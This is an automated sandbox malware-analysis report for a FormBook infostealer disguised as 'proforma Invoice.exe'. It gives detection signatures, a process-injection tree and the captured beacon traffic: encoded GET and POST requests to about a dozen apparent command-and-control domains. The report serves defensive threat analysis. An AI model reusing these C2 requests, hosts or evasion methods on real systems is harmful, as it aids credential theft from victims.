Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
proforma Invoice.exe

Overview

General Information

Sample name:proforma Invoice.exe
Analysis ID:1550873
MD5:3757282ce10c90df6d5e364e22975534
SHA1:7b1b6eca6f742cfc044a83c433a506302b1d277e
SHA256:519e372bb8026c5aea93a6d44aefb4b08eb23731f2f902ae35866c5d6cc3dd97
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • proforma Invoice.exe (PID: 7116 cmdline: "C:\Users\user\Desktop\proforma Invoice.exe" MD5: 3757282CE10C90DF6D5E364E22975534)
    • proforma Invoice.exe (PID: 5472 cmdline: "C:\Users\user\Desktop\proforma Invoice.exe" MD5: 3757282CE10C90DF6D5E364E22975534)
      • kYuxUXtJmKaZ.exe (PID: 5776 cmdline: "C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • EhStorAuthn.exe (PID: 5876 cmdline: "C:\Windows\SysWOW64\EhStorAuthn.exe" MD5: 0C9245FDD67B14B9E7FBEBB88C3A5E7F)
          • kYuxUXtJmKaZ.exe (PID: 2276 cmdline: "C:\Program Files (x86)\hZwvkfAAPORRvPaKOyuyOGKGcKxWIVZmFjJDASwISFEbYwBrUWyIMNVx\kYuxUXtJmKaZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6160 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2475809214.00000000010D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.4500691276.00000000053F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4499075005.0000000004530000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.4499024657.00000000044E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.proforma Invoice.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.proforma Invoice.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-07T10:09:14.534827+010020229301A Network Trojan was detected4.245.163.56443192.168.2.549709TCP
                2024-11-07T10:09:53.290899+010020229301A Network Trojan was detected4.245.163.56443192.168.2.549922TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.spencermarcu.movie/6jke/?N6gPj2W=rRJ/+EeoqQH1jv9h2PxYf0uEP5S/0RESCBDmMrxCZyLsd2TFJm1VUMTcv3pSTCQ1Dx8MnXqZSxSGPUkXGUSRGRBSA9xnN9k9eX0mqtLeTR1pd/EPiIm/QSAex0qPnPOTeQ==&yx-=dF9dYX9pQR-xIhFpAvira URL Cloud: Label: malware
                Source: http://www.spencermarcu.movie/6jke/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: proforma Invoice.exeReversingLabs: Detection: 52%
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.proforma Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2475809214.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4500691276.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4499075005.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4499024657.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2476745672.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4498872401.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: proforma Invoice.exeJoe Sandbox ML: detected
                Source: proforma Invoice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: proforma Invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: EhStorAuthn.pdbGCTL source: proforma Invoice.exe, 00000003.00000002.2475617708.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000005.00000002.4498094986.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kYuxUXtJmKaZ.exe, 00000005.00000000.2387057880.000000000052E000.00000002.00000001.01000000.0000000C.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4497067951.000000000052E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: proforma Invoice.exe, 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.2475630207.00000000043E8000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.2477867470.000000000459E000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: proforma Invoice.exe, proforma Invoice.exe, 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, EhStorAuthn.exe, 00000006.00000003.2475630207.00000000043E8000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4499240782.0000000004750000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.2477867470.000000000459E000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.4499240782.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: EhStorAuthn.pdb source: proforma Invoice.exe, 00000003.00000002.2475617708.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000005.00000002.4498094986.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_006FC270 FindFirstFileW,FindNextFileW,FindClose,6_2_006FC270
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 4x nop then jmp 07D9E55Eh0_2_07D9DC44
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 4x nop then jmp 07D9E55Eh0_2_07D9DBE0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 4x nop then xor eax, eax6_2_006E9DA0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 4x nop then mov ebx, 00000004h6_2_046304E8
                Source: Joe Sandbox ViewIP Address: 52.20.84.62 52.20.84.62
                Source: Joe Sandbox ViewIP Address: 195.110.124.133 195.110.124.133
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49709
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49922
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /4d7f/?yx-=dF9dYX9pQR-xIhFp&N6gPj2W=GYb0rmyr/JAlLZNhnt/PbSIY/4LKqg5t8esebmIUXrwcEcXD+HGwSEbbxHn9xefIHUHI8DRuA6hSDuYZVaPcSdBlDCtcl1FCkIwA6S5urJUXpT4lrZ2q29hRsWK9NvLVVQ== HTTP/1.1Host: www.trifecta.centerAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /qfwu/?N6gPj2W=6fCxb2xLzjzF4nD7KjQhWEUB1Dc/xE2Ac7kR0Mi0XoRopjw7HNNCf6pSJ3AnVDHsLPCXmSmdJmWxpgfBXwwA4t7semSG378seryKT9cw4v33ezM47Ih1j5HvwkKKbWbCpg==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1Host: www.seraph.bestAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /o5fg/?N6gPj2W=5onoMf6BmQl2QeVt/VrvVQYA8O/0+XqHKAgaJU0renyYnLBIrjMEkLORFTCyyhU0JhHfx4R92TWl4c733/RJY99e60Kw3j0IgWhxS41JWxIsLFgO3NczRgQE1UQqfRS1SQ==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1Host: www.owinvip.netAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /9rsa/?N6gPj2W=MJaEnwMoptGuAyQmB3iPl7F+p8qtmKUBGuoMdJ29iBxpANTscusPMMCgTv6bu6SX3cIivBJkXrMlI2rZEQxlLsosjm3OJjcrR+TIxZJDXxtdEHg1mRP53ezQuvD90TyBQQ==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1Host: www.thefokusdong43.clickAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /6jke/?N6gPj2W=rRJ/+EeoqQH1jv9h2PxYf0uEP5S/0RESCBDmMrxCZyLsd2TFJm1VUMTcv3pSTCQ1Dx8MnXqZSxSGPUkXGUSRGRBSA9xnN9k9eX0mqtLeTR1pd/EPiIm/QSAex0qPnPOTeQ==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1Host: www.spencermarcu.movieAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /7ozt/?N6gPj2W=psE7W4vuissyAl/ABd0RRSDRsgAd/B1BJj48EisfIdJC69TtqD1fLSmJuMdappGAEB9CQAwJ1/7vpTPOyeunU+wS9pROO2BCMLDVBWEVc4ObTViQoI1sZt/u29nLO6JUpw==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1Host: www.roopiedutech.onlineAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /c52l/?N6gPj2W=CYuySeqU886kxlWyyNa/wcd36R1F3r0dFV8i/RXeMxM6gRw3d8zll6e6+mgIULDdoE9y629/Yed0CV4AMnOIzXEmhgnpyaCJF/2Tl+LMvC2Uf6a/XdOYn+kCA+BMl9RbhA==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1Host: www.seikai.clickAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /saaz/?N6gPj2W=E1XhlXFLcWuCDIBP8to2tuUVnSemexwJ48Ab55V5HKBvWu90vpvIEGRMt7lYWMU5NPNXOFUjE36KCHhW/fBhyMiphohAP4glwjROtQZlzRCPRSaJk41pBGj4Bhn1O6AIFQ==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1Host: www.jorbaq.topAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /w6i7/?N6gPj2W=zf72HCwdm90Brz0/xWE1IYSOiQ3p3A59Q1iHXpkTu9OkdWFvcQX+8+iDJHR0+30T1teAh9aKH0eMHZRU0BnG1yy/rK5I2oPmb97GAfqKy80sg6qoYznK3DHqFQwxpou29A==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1Host: www.neg21.topAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /2k8c/?N6gPj2W=LN885FCenV0arV5pDJ6h3a+LwxHrBQx0V+LnHznGnxO866p5HdYgFA4Q1Lryskeb84lUzgc9oK+kYxVS/Lu8euZMIM/0QxNAF1muDsae+W878EIY9SjqXiybtD+r8qgxLw==&yx-=dF9dYX9pQR-xIhFp HTTP/1.1Host: www.suerteconysa.onlineAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficHTTP traffic detected: GET /xtuc/?yx-=dF9dYX9pQR-xIhFp&N6gPj2W=nl7gM5aMdEMYbb3ptVYmv1b7ec2+/kw+vnGGIIbLXQ8RGikaSqRdhk/1NtXc33OFwO5l66LjcfQUL5smZ/PpUkgPTPCZ371zTnVFYiKZa83XWAN88d/vEa+bzXIHSkQ2pw== HTTP/1.1Host: www.nutrigenfit.onlineAccept: */*Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0
                Source: global trafficDNS traffic detected: DNS query: www.trifecta.center
                Source: global trafficDNS traffic detected: DNS query: www.seraph.best
                Source: global trafficDNS traffic detected: DNS query: www.owinvip.net
                Source: global trafficDNS traffic detected: DNS query: www.thefokusdong43.click
                Source: global trafficDNS traffic detected: DNS query: www.spencermarcu.movie
                Source: global trafficDNS traffic detected: DNS query: www.roopiedutech.online
                Source: global trafficDNS traffic detected: DNS query: www.seikai.click
                Source: global trafficDNS traffic detected: DNS query: www.jorbaq.top
                Source: global trafficDNS traffic detected: DNS query: www.neg21.top
                Source: global trafficDNS traffic detected: DNS query: www.suerteconysa.online
                Source: global trafficDNS traffic detected: DNS query: www.nutrigenfit.online
                Source: global trafficDNS traffic detected: DNS query: www.meetebok.shop
                Source: unknownHTTP traffic detected: POST /qfwu/ HTTP/1.1Host: www.seraph.bestAccept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: http://www.seraph.bestReferer: http://www.seraph.best/qfwu/Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 208Connection: closeUser-Agent: Mozilla/5.0 (X11; SunOS i86pc; rv:31.0) Gecko/20100101 Firefox/31.0Data Raw: 4e 36 67 50 6a 32 57 3d 33 64 71 52 59 43 4a 6d 30 6a 6a 51 79 6e 58 68 4a 53 4a 54 43 78 73 4f 7a 67 49 48 33 6e 53 49 57 5a 30 49 31 4d 50 67 57 35 31 4f 30 53 49 31 46 64 31 36 49 50 4a 6f 4d 31 73 45 4c 53 44 7a 63 66 6d 51 69 68 36 4f 48 58 4b 70 72 53 62 4b 54 43 4e 72 6a 63 69 58 50 7a 72 35 6b 5a 38 69 43 61 2b 56 55 37 55 49 37 4a 6d 36 4f 54 63 6d 78 75 64 7a 71 2f 50 42 31 79 65 6e 4c 55 47 6f 6f 2b 4e 58 63 4b 68 58 42 4c 37 72 73 36 74 37 36 46 48 4e 36 65 34 31 62 54 4c 44 4c 6d 4a 39 6c 57 4f 58 4d 47 73 44 6a 73 6a 65 55 43 66 63 34 57 31 57 49 42 69 77 73 6b 31 69 72 69 57 79 52 79 52 5a 42 49 73 3d Data Ascii: N6gPj2W=3dqRYCJm0jjQynXhJSJTCxsOzgIH3nSIWZ0I1MPgW51O0SI1Fd16IPJoM1sELSDzcfmQih6OHXKprSbKTCNrjciXPzr5kZ8iCa+VU7UI7Jm6OTcmxudzq/PB1yenLUGoo+NXcKhXBL7rs6t76FHN6e41bTLDLmJ9lWOXMGsDjsjeUCfc4W1WIBiwsk1iriWyRyRZBIs=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 07 Nov 2024 09:11:08 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 07 Nov 2024 09:11:11 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 07 Nov 2024 09:11:13 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 